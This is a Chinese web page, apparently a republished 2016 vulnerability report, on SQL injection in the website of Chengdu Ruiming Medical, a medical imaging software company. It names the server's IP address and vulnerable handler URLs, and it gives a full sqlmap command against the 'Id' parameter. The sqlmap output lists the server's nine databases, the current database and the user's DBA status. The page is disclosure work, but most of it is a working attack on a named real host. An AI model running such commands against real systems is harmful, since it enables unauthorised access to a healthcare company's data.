首页 > 安全 > 网站安全 >

睿明医疗主站多处sql注入漏洞致敏感信息泄露

2016-02-23

成都睿明医疗信息技术有限公司是一家致力于医疗信息化领域专业从事PACS RIS HIS医学影像信息系统产品的研究、开发、生产和销售的高新技术企业。公司主要研发人员具备深厚的医学影像研究背景

RT

成都睿明医疗信息技术有限公司是一家致力于医疗信息化领域专业从事PACS/RIS/HIS医学影像信息系统产品的研究、开发、生产和销售的高新技术企业。公司主要研发人员具备深厚的医学影像研究背景,技术积累雄厚,前期在医疗影像处理、三维重建,乳腺CAD、肺结节检测、其它计算机辅助诊断等主要技术储备具有......

http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134


QQ20160108-10@2x.png


QQ20160108-11@2x.png


python sqlmap.py -u "http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134" -p Id --dbs

available databases [9]:
[*] master
[*] model
[*] msdb
[*] newMedicinePlatform
[*] ReportServer
[*] ReportServerTempDB
[*] RMFitness
[*] RmmitData
[*] tempdb




[19:53:53] [INFO] fetching current database
current database:    'RmmitData'
[19:53:53] [INFO] testing if current user is DBA
current user is DBA:    False
[19:53:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[19:53:53] [INFO] fetched data logged to text files under '/Users/Apple/.sqlmap/output/123.56.113.223'




QQ20160108-12@2x.png




http://123.56.113.223:8081/Handler/Paging.ashx?pageIndex=1&type=Working&d=73


QQ20160108-13@2x.png

相关文章
最新文章
热点推荐